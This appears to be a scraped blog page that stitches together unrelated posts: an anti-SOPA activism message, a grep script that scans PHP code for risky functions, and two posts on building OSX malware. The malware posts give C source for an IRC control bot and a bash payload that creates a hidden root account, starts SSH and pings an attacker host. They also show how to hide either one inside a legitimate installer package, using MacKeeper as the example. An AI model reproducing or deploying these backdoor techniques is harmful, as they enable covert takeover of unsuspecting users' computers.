I’m going to be compiling a simple IRC bot, you’ll see the random nick generation etc has been omitted however this could easily be modified in a real world scenario to perform pretty much anything you’d like it to. At the moment it will allow you to log in and op yourself on a channel.

Code below.

[C]

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/time.h>

#include <sys/select.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <time.h>

#include <string.h>

#include <strings.h>

#include <stdio.h>

#include <stdlib.h>

#include <ctype.h>

#include <netdb.h>

#include <stdarg.h>

#include <unistd.h>

#define PASSWORD “p”

#define CMDPREFIX “.”

#define IRCSERV “irc.x.org”

#define IRCPORT 6667

#define IRCCHAN “#channel”

#define IRCPASS “”

#define BOTNICK “bot”

int sock;

char logged_in[64];

int irc_send(char *Format, …)

{

va_list va;

char buf[1024];

memset(buf,0,sizeof(buf));

va_start(va, Format);

vsprintf(buf, Format, va);

va_end(va);

printf(“%s”, buf);

return send(sock, buf, strlen(buf), 0);

}

char *host_addr(const char *addr)

{

/* performs host resolution, pass NULL to get local ip */

struct hostent *he = NULL;

char address[64];

if (addr == NULL)

strcpy(address, “”);

else

strcpy(address, addr);

he = gethostbyname(address);

if(he == NULL)

return NULL;

return inet_ntoa(*(struct in_addr *) he->h_addr_list[0]);

}

////////////////////////////////////////////////////////////////////////

// Establishes a connection to the IRC server.

//

int irc_connect()

{

struct sockaddr_in addr;

addr.sin_addr.s_addr = inet_addr(host_addr(IRCSERV));

addr.sin_family = AF_INET;

addr.sin_port = htons(IRCPORT);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)

return 0;

if (strlen(IRCPASS))

irc_send(“PASS %s\r\n”, IRCPASS);

irc_send(“USER %s . . :bitchx\r\n”, BOTNICK);

irc_send(“NICK %s\r\n”, BOTNICK);

sleep(10);

irc_send(“JOIN %s\r\n”, IRCCHAN);

return 1;

}

////////////////////////////////////////////////////////////////////////

// Parse data for \n into chunks to be processed for command

// processing.

//

int irc_read(char *buffer, size_t size)

{

char *result;

unsignedshort len;

char msg_from[256], msg_type[16], msg_to[64], msg_data[512];

printf(“%s”, buffer);

/* parse multiple lines */

if ((result = strtok(buffer, “\n”)) != NULL)

{

do

{

/* pong back to the server */

if (!strncasecmp(result, “PING “, 5))

{

result[1] = ‘O’;

irc_send(“%s\n”, result);

}

else

{

char *cr;

/* check for leading : then remove it and initialize msgd */

if (result[0] != ‘:’)

return -1;

result++;

/* fill msgd.from with 1st parameter */

len = strstr(result, ” “) – result;

if (len < 1 || len > sizeof(msg_from)-1)

return -1;

strncpy(msg_from, result, len);

result = result+len+1;

/* fill msgd.type with 2nd parameter and make it all uppercase */

len = strstr(result, ” “) – result;

if (len < 1 || len > sizeof(msg_type)-1)

return -1;

strncpy(msg_type, result, len);

result = result+len+1;

for (len = 0; len < strlen(msg_type); len++)

msg_type[len] = toupper(msg_type[len]);

/* if there is a 3rd parameter then fill msgd.to with it */

if (result[0] != ‘:’)

{

len = strstr(result, ” “) – result;

if (len < 1 || len > sizeof(msg_to)-1)

return -1;

strncpy(msg_to, result, len);

result = result+len+1;

}

else

result++; /* strip leading : */

/* fill msgd.data with the remainder of the buffer */

if (result[0] == ‘:’)

result++; /* strip leading : */

if (strlen(result))

strncpy(msg_data, result, sizeof(msg_data) – 1);

if ( (cr = strrchr(msg_data, ‘\r’)) != NULL)

cr[0] = 0;

/* send msgd to be parsed further */

irc_parse(msg_from, msg_type, msg_to, msg_data);

}

}while((result = strtok(NULL, “\n”)) != NULL);

}

}

int irc_parse(char *msg_from, char *msg_type, char *msg_to, char *msg_data)

{

long len;

char *buf = msg_data;

char nick[32], user[32], host[128], chan[64];

if (!strcmp(msg_type, “451″))

{

irc_send(“USER %s . . :gucciman\r\n”, BOTNICK);

irc_send(“NICK %s\r\n”, BOTNICK);

return 0;

}

///////////////////////////////////////////////////////////

//               PARSED MESSAGE HANDLER                  //

///////////////////////////////////////////////////////////

/* parse through data to fill variables */

buf = msg_from;

if (strcmp(msg_type, “PRIVMSG”))

return 0;

if (!strlen(msg_data))

return 0;

/* extract the nick from the buffer and fill ui struct */

if ((len = strstr(buf, “!”) – buf) < 1)

return 0;

if (len > (sizeof(nick) – 1))

len = sizeof(nick) – 1;

strncpy(nick, buf, len);

buf = buf+len+1;

/* extract the ident from the buffer and fill ui struct */

if ((len = strstr(buf, “@”) – buf) < 1)

return 0;

if (len > (sizeof(user) – 1))

len = sizeof(user) – 1;

strncpy(user, buf, len);

buf = buf+len+1;

/* copy the remainder of the buffer into ui struct */

strncpy(host, buf, sizeof(host) – 1);

strncpy(chan, IRCCHAN, sizeof(chan) – 1);

irc_cmd(nick, user, host, chan, msg_data, msg_type);

return 0;

}

////////////////////////////////////////////////////////////////////////

// Main command parsing and processing function. Breaks the message

// down into parameters and dispatches them to their associated

// set of code for processing.

//

int irc_cmd(char *nick, char *user, char *host, char *chan, char *msg_data, char *msg_type)

{

/* handle command processing */

char ctcp_time[] = “\001TIME\001″;

char ctcp_version[] = “\001VERSION\001″;

char param[9][128];

char *buf = msg_data;

unsignedint k;

long len = 0;

/* VERSION */

if (!strncmp(buf, ctcp_version, sizeof(ctcp_version) – 1))

{

irc_send(“NOTICE %s :\001VERSION eggdrop v2.0.1\001\r\n”, nick);

return 0;

}

/* TIME */

if (!strncmp(buf, ctcp_time, sizeof(ctcp_time) – 1))

{

struct tm *gmt;

time_t gtime;

time(&gtime);

gmt = gmtime(&gtime);

irc_send(“NOTICE %s :\001TIME %s\001\r\n”, nick, asctime(gmt));

return 0;

}

///////////////////////////////////////////////////////////

//                        INIT                           //

///////////////////////////////////////////////////////////

/* set variables to null and copy the message into the buffer for processing */

memset(&param, 0, sizeof(param));

if ( strncmp(buf, CMDPREFIX, strlen(CMDPREFIX)) )

return 0;

/* copy the command and parameters into param[1-8] */

for (k = 0; k < (sizeof(param) / sizeof(param[0])); k++)

{

/* strip leading command prefix */

if (k == 0)

{

if ( !strncmp(buf, CMDPREFIX, strlen(CMDPREFIX)) )

buf+=strlen(CMDPREFIX);

}

/* length is the location of the first 20h minus the location of the start of string */

if (strstr(buf, ” “))

len = strstr(buf, ” “) – buf;

else

len = 0;

if (len < 1)

break;

if (len >= sizeof(param[0]))

strncpy(param[k], buf, len – sizeof(param[0]) – 1);

else

strncpy(param[k], buf, len);

buf = buf+len+1;

}

if (strlen(buf))

strncpy(param[k], buf, sizeof(param[k]));

/* .login <password> – request login using password */

if (!strcmp(param[0], “login”))

{

if (!strlen(param[1]))

return 0;

if (!strcmp(PASSWORD, param[1]))

{

strcpy(logged_in, PASSWORD);

irc_send(“PRIVMSG %s :You have been logged in.\r\n”, chan);

}

else

memset(&logged_in, 0, sizeof(logged_in));

return 0;

}

///////////////////////////////////////////////////////////

//                       LOGGED                          //

///////////////////////////////////////////////////////////

/* drop request if not logged in */

if (strcmp(PASSWORD, logged_in))

return 0;

/* .op <nick> */

if (!strcmp(param[0], “op”))

{

irc_send(“MODE %s +o %s\r\n”, chan, nick);

return 0;

}

return 0;

}

int main(int argc, char *argv[])

{

fd_set fds;

time_t tov_count;

double bot_tov = 0;

time_t sock_tov;

struct timeval tv;

/* initialize data values */

srand(time(NULL));

memset(&tv, 0, sizeof(tv));

tv.tv_sec = 1;

/* start main socket read loop */

while(1)

{

/* setup socket for select() model */

FD_ZERO(&fds);

FD_SET(sock, &fds);

select(0, &fds, NULL, NULL, &tv);

/* store time for timeout value and check it */

time(&tov_count);

bot_tov = difftime(tov_count, sock_tov);

/* bot timed out, reconnect: else check for process data packet */

if (bot_tov > 200)

{

close(sock);

irc_connect();

time(&sock_tov);

}

else if (FD_ISSET(sock, &fds))

{

int len;

char buffer[2048];

/* reset socket read time and initialize buffer */

memset(buffer, 0, sizeof(buffer));

len = recv(sock, buffer, sizeof(buffer)-1, 0);

/* error reading from socket: reconnect and reset socket read time */

if (len <= 0)

{

close(sock);

irc_connect();

time(&sock_tov);

}

time(&sock_tov);

/* send data for processing */

irc_read(buffer, strlen(buffer));

}

}

return 0;

}

[/C]

Now we have our source, let’s compile!

Excellent, compiled with no errors.

Now we’re going to see if we can add this binary to an existing pkg file without disrupting it’s existing workflow… let’s use MacKeeper as an example and open it with Package Maker.

We set our drop location for the binary to /usr/bin and make sure it requires admin auth.

Changing out owner / group to the highest privs possible.

Our post run script which is a very simple:

[bash]

#!/bin/sh

/usr/bin/bot

[/bash]

Now to run the installer and watch the results! Note the window titles and etc I didn’t care to set as this is a proof of concept. An attacker would do everything they could to make the package seem legitimate.

And what happens?

File dropped and executed just as we’d planned. Seeing as the majority of OSX users don’t use an AV solution I’m surprised malware isn’t a lot more widespread!

Now that Congress has had time to process last week’s internet blackout, a consensus has emerged: SOPA and PIPA are toxic for politicians, and going anywhere near them could cost them their re-election.

Freedom is winning.

Together, we’ve done something amazing– never have so many people stood up to defend a free and open internet.  Here’s a San Francisco Chronicle article about how it all came together: The Largest Online Protest in History Started Here.

And here’s Carl Franzen at Talking Points Memo:

“Behind the scenes, Hill staffers from both sides of the aisle confirmed to TPM that the entire piracy debate had become so ‘toxic’ that virtually no lawmakers were likely to be ready to re-engage it anytime soon.”

Experienced Congress-watchers are telling us they’ve never seen anything like this.

Internet users, tech companies, and non-profits joined together to defend fundamental rights on the internet. To a lot of elites in Congress and the corporate world, the internet is just something that lazy teenagers use to spam people with pictures of photoshopped unicorns. The blackout showed that the peer-to-peer internet is about empowerment, and that when we work together we can defeat the corrupt politics of Washington D.C.

The New York Times and Talking Points Memo have both published good articles on how the web blackout was organized.

For months, four senators were the only force blocking passage of PIPA/SOPA. They even promised to filibuster the bill back when most politicians were against them. We need to make sure we support and vote for leaders like them who are willing to going to go out on a limb and oppose SOPA before it was popular to do so. It’s great that we pressured all those other shlubs into opposing web censorship, but these guys deserve the real cred and our support: Click here to donate (scroll down).

What’s next?  The Fight is not over, already new threats to web freedom are starting to emerge (particularly in Europe) and we’re getting ready.  Stay tuned, and for more updates, follow us on Twitter and Facebook.

Thank you again for standing up for a free and open internet!

- Donny and Fight for the Future

Need I say more? (win)

[bash]

#!/bin/bash

echo “jakes quick PHP function finder”

echo “all results will be placed in files with their respective names”

echo “Enter the full path to the directory you want to scan and press [ENTER]:”

read path

echo “Scanning for MySQL injection”

echo “1/1″

grep -A3 -B3 -r -n “mysql_query(” “$path” > mysql-query.txt

echo “Done”

echo “Scanning for local / remote file inclusion”

echo “1/4″

grep -A3 -B3 -r -n “include(” “$path” > include.txt

echo “2/4″

grep -A3 -B3 -r -n “require_once(” “$path” > require-once.txt

echo “3/4″

grep -A3 -B3 -r -n “include(” “$path” > include.txt

echo “4/4″

grep -A3 -B3 -r -n “include_once(” “$path” > include-once.txt

echo “Done”

echo “Scanning for command exec”

echo “1/7″

grep -A3 -B3 -r -n “eval(” “$path” > eval.txt

echo “2/7″

grep -A3 -B3 -r -n “preg_replace(” “$path” > preg-replace.txt

echo “3/7″

grep -A3 -B3 -r -n “fwrite(” “$path” > fwrite.txt

echo “4/7″

grep -A3 -B3 -r -n “passthru(” “$path” > passthru.txt

echo “5/7″

grep -A3 -B3 -r -n “file_get_contents(” “$path” > file-get-contents.txt

echo “6/7″

grep -A3 -B3 -r -n “shell_exec(” “$path” > shell-exec.txt

echo “7/7″

grep -A3 -B3 -r -n “system(” “$path” > system.txt

echo “Done”

echo “Scanning for file system bugs”

echo “1/6″

grep -A3 -B3 -r -n “fopen(” “$path” > fopen.txt

echo “2/6″

grep -A3 -B3 -r -n “readfile(” “$path” > readfile.txt

echo “3/6″

grep -A3 -B3 -r -n “glob(” “$path” > glob.txt

echo “4/6″

grep -A3 -B3 -r -n “file(” “$path” > file.txt

echo “5/6″

grep -A3 -B3 -r -n “popen(” “$path” > popen.txt

echo “6/6″

grep -A3 -B3 -r -n “exec(” “$path” > exec.txt

echo “Done”

echo “Finished scanning”

exit

[/bash]

First things first this got me to thinking, if I had some form of malware for OSX what would be the best way to distribute it? There are many options which immediately spring to mind however one stands proud. Backdooring some legitimate software package so the malware will run invisible to the end user. This should be even easier as most people (myself included) don’t bother running any AV solutions on their OSX installs.

Let’s take a look at an easy way to include some evil code inside some innocent looking package.

First off let’s create a simple bash script to perform the tasks which we need performed. I will comment it so it’s easy to understand what each section does. Our workflow is as follows.

• . Create user account with root privileges which is hidden
• . Start some service which allows us remote access to the machine
• . Set up some way of the machine letting us know where it is (ip address) as we’re going to be spreading our payload to random machines

I’ll add more features in future, the ones I’d like off the top of my head.

• . Connect back to CNC server (botnet-like)
• . Automatically retrieve updated versions of our malware on startup
• . Self defence mechanism, possibly through cron or a backdoor in other plist file, need to think about this one

Now let’s get started. The easiest way to achieve what we want to do is to create a bash script which will add a hidden user account, enable certain services (SSH) and ping a host we control to let us know it’s live.

Googling OSX commands I stumbled across this website where the guy was doing something similar except generating payloads with Metasploit, stole a part of his script (the user creation) and I suggest you check his blog out, some very cool material on there.

http://www.darkoperator.com

Here’s our Bash script we’re going to package with a legitimate installer..

[bash]

#!/bin/sh

dscl . -create /Users/dark

dscl . -create /Users/dark UserShell /bin/bash

dscl . -create /Users/toddharris RealName “Darkoperator”

dscl . -create /Users/toddharris UniqueID 0

dscl . -create /Users/toddharris PrimaryGroupID 0

# Creates user and sets privs

dscl . -passwd /Users/dark P@55w0rd

dscl . -create /Users/dark NFSHomeDirectory /Users/dark

mkdir /Users/dark

chown dark:staff /Users/dark

chflags hidden /Users/dark

# Creates homedir, hides it, passwords user we created

# Now to start sshd

/usr/libexec/sshd-keygen-wrapper

/usr/sbin/sshd

# Now we’re going to ping a remote host

ping -c 3 captureserver.com exit [/bash]

The idea behind the ping is I’m just lazy and it works. Very easy to capture these requests in Wireshark or etc. :)

Now we have our script which will do everything we need to gain remote access to the machine all we need to do is package it!

Built into OSX is a utility called PackageMaker, it’s similar to iexpress for Windows… :3

For the purposes of this post I will be using an entirely different bash script which will simple create some directories, we can then check for their existence to be sure this method is viable. As we’re going to ask the installer to escalate the privileges this shouldn’t be a problem.

[bash] #!/bin/sh mkdir /testing/ exit [/bash]

Now I’m going to build a pkg file with a random dmg image inside it which should be dropped in “/” on completion. Of course with slight modification you could make this process a lot more transparent to the end user however no need for that here.

To save on taking a heap of screenshots I’ve made a nice video instead :) You can clearly see the process and see the bash script has successfully executed!

Click here to view the video on YouTube.

So there you have IT, OSX malware using nothing more than a bash script and the built in package maker utility.